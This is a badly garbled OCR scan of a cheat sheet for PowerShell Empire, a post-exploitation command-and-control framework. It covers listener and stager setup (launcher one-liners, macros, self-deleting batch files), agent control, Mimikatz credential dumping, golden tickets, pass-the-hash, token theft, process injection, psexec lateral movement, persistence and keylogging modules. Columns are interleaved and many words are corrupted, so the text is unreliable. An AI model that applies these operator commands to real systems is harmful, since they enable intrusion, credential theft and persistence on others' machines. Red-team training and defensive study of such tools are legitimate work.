, stan tion: se OPTION VALUE 
Veris Group Oe a, ae (Empire: agents) > 


Unset an option: unset OPTION Change to the agents menu from any menu location with 


(TEI, oc. fore civen i —— e.. ag@Mitachis will show the currently active agents/config 


[tab] STAGERNAME LISTENER and some basic system config information. 


To generate a launcher one-liner: launcher LISTENER List active (or stale) agents list(stale] 


Empire Cheat Sheet Sethe caren Ise onfioinstinofopions [ai Rfecive- BL 





Adaptive Threali isin ete ll ‘interact with an agent ‘| interactID. 
Start a listener with the currently set options: execute Interact with an agent 


Clear one (or all) agent clear [tab] ID/all 
tasking 


Kill one (or all) agents kill [tab] ID/all 





Getting Started Presale dec eeeeeee de acess Sasso te EGEEeeEeEeSEEEH eS cee ceeccctachete tbc cceseee te teea ea teceeeeeeccec ae etc teehee eet cae cee eet eee eee ett etal ce eeedtaeeatee eeeeeeesteae 


Kill one (or all) listeners: kill [tab] NAME/all 
Get Empire: # git clone 
https://github.com/PowerShellEmpire/Empire or ——— Date for the listener to exit 
download the latest release from (MM/dd/yyyy) 
https://github.com/PowerShellEmpire/Empire/releases — Name alias to give the 
Run setup: # ./setup/install.sh listener ianowh 
Runsetuest fetus Me ~ | —| | Rename an agen 
Reset your installation: # ./setup/reset.sh DefaultLostLimit Number of missed checkins 
eee Fae eee before exiting Set the working hours for workinghours [tab] 
eens ee ree Se a a Bi native, pivot, hop, foreign, one (or all) agents ID/all 9:00-17:00 
Documentation at: htt giaivwiaiieelEmpire.com meter (Empire: AGENTID) > 


Return back to the main Empire menu at any point with DefaultDelay Agent delay/reach back This is the main interactive menu for an Empire agent. 
main, exit with exit (or Ctrl+C). Go back to the previous interned (in seconds) Various shell alia infilfihe main agent menu: stein 


menu with back. Type help at any point for a list of 
commands and their descriptions. 


WorkingHours Hours for the agent to Is, mv, cp, rm, cd, ipconfig, getpid, route, whoami, 
ee he operate (09:00-17:00) restart, shutdown. 
You can list all agents or listeners from any menu with nana 2.05) ss rr a guui ave avaasea abba seedaveees seein seeeess 
. : http[s]://HOSTNAME:PORT | WARNING: any command entered that doesn’t resolve 
list [agents/listeners] ; 
cen Fee... for staging (also takes IP) to any alias or an agent command will be executed as a 


To manually edit the backend db: # sqlitebrowser path te pem cert to HTTPS native PowerShell command on the target! 
ce a | Display agentinformation | info 
a. nnn DefaultJitter Jitter in agent reachback Isplay agent intormation 
Empire has a heavy UI focus with lots of tab-completion. 
nt eee ee 6 6=— A RR ene interval (0.0-1.0). Clear the agent tasking ccear 
Logging and Downloads (Empire: stager/stager_name) > Execute a (Power)shell shell CMD 

command 





Remove one, all, or stale remove [tab] 
agents from the database ID/all/stale 











lf -debug specified, info in ./empire.debug 
eee Ve Empire has a modular approach to generating stagers 


Each agent that checks in has a complete log of (the way you’re going to get code execution on a remote List process names ps explorer 
tasking/results located in: machine). You can access these from main or listeners matching a pattern 
./downloads/AGENTNAME/agent.lo 

7 downlonds/AGENTNAME/45¢ ak with usemodule [tab] STAGER [LISTENER_NAME] Download targéefile download ./PATH/file 
Downloads/other module output for each agent are also info/options will display the current option sets, and EEE filedMiMe current | upload 

stored in ./downloads/ AGENTNAME /* set/unset works similarly to the listener menu. generate path ./attacker/path/file.txt 
(Empire: listeners) > will generate the current stager/options. Naskalt co exit eit 
Change to the listeners menu from any menu location in ‘launcher =—'| Commandone-liner 


Empire with listeners. This will show the currently active launcher Self-deleting .bat file 
listeners (list also shows this). Listeners are preserved in = = Kill a background job jobs kill JOB_ID 
./data./empire.db and start back up on Empire startup. pmacro. si Anoffice macro. Killa process KIPID 
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Get/set agent killdate 
Rename agent 
Set an agent to sleep X 
seconds with 0.Y jitter 

Execute bypassuac 


Run Mimikatz’ 


List only hashes Fhasho collection/screenshot Takes screenshots 
List only plaintext plaintext lateral_movement/invoke | Triggers new agent on 


Widearecadennials add dorian lateral movement/invoke | Takes a listener name and 
password _psexec triggers a new agent using 


PSEXEC 


Remove a credential remove 
CRED_ID/CRED1- management/psinject Inject an Empire agent 
CRED2/all into another process. 


Export current creds export ./path/creds.csv management/enable_rdp | Enable RDP access 
Searchiaelnieinc rm *user®# management/wdigest_do | Download a system to use 
Wdigest and lock screen 


er ee wngrade 
Various Mimikatz functionality is implemented in 
credentials/mimikatz/* : persistence/userland/* Various userland 


= persistence options 
logonpasswords Execute all current Mimikatz in- ’ 
memory credential modules persistence/elevated/ Various elevated 
a persistence options 
Dump local hahes from LSA (including WMI) 
(useful on DC ;) 
ae persistence/misc/* Misc. persistence options 
sekurlsa (accepts a | 
To use a module from the main or agents menu, type i — options, memssp, etc.) 
usemodule [tab] type/module a DC hashes w/out DC code privese/powerdana Bat erUp privesc 
PO, ON. ——_—_—— oxGemnion ae 
To search module descriptions/names, use checks/weaponization 
searchmodule TERM golden_ticket Build/inject a golden ticket vectors 
sseseusesensesoneesensesenreseeessagesseresoneessageseenesonsersasesensesonsereasetenresonsers1se SOR RO vsone once ETI. savsessastsessesnseseasnsenresonserensesenresouseneasesensesoneenea (accepts a krbtgt CRED_ID) 7 : . 
Every module has a set of required [and optional] 3 situational_awareness/ne | Various PowerView 
settings. On module execution, if a module is specified as Purge all Kerberos tickets from twork/powerview/* network/domain 
needing administrative privileges or is not opsec safe, ey functionality 


Empire will print a warning/confirmation. ‘command Custom Mimi command situational_awareness/ho 
nee: Me ee ‘ 
You can see the current module options with Useful Modules st/ modules 


sekurlsa::logonpasswords 


Steal a process token steal_token PID 

Inject a given hash from pth CRED_ID 

the credential database 

Import a .ps1 into memory | scriptimport ./path.ps1 


Run an imported .ps1 cmd _ | scriptcmd [tab] Invoke- 
Function 

Inject an Empire agent into | psinject [tab] LISTENER 

another process ID PID 


(Empire: type/module_name) > 



















info/options, and can set/unset options similarly to the Empire has over 100 pure-PowerShell post-exploitation Network based recon 
listenermenu. ell fF; modules. Below is a brief highlight of a few particularly Mm OGUIce TeSea ce 
To set a module to run as an agent’s first tasking after useful ones. These heavily draw on existing PowerShell LAN 
checking in: set Agent autorun . To clear the autorun tech, and the original authors for each are highlighted in [7 Serr 

ee ee ee pee er e€,  a, —— 
tasking out, clear autorun from the agents menu. | c http://www.verisgroup.com/adaptive-threat-division/ 

. . collection ke lo er Lo ke strokes eT occ ccecsoees: MOE oes noecacecsoeescesscessseneceneeeneesnsesnoesaoesoessoeascesscenaseneesnecsnoesnoes sees sees soeascesasenaseneesneesnoesaeesseessoeasoesssesaseneseneesneasaeesanersoes 
Mimikatz and the Cred Store /keylogs sie Documentation: http://www.PowerShellEmpire.com/ 
Empire will automatically scrape parsed Mimikatz collection/get_indexed_it Query the Windows re, esos eee — Peete ca eee ehcseesea accusation stpegssletasep bass stots peastece Peete gasatotsaeeasvapctsstetssabeticataaqateatsttaasstasttaceeanpstactettiarestiacteaatezeattasaats 
credentials and save them in a backend credential model. em search indexer for files w/ oO" 


http://www.PowerShellEmpire.com/?page_id=133 





These can be access edfrom any menu with creds and specific terms 
used by modules that accept CredID. 


collection/inveigh Basic LLMNR/NBNS ar ee ae ieesge ete 
List all credentials spoofing  #£| = ee 
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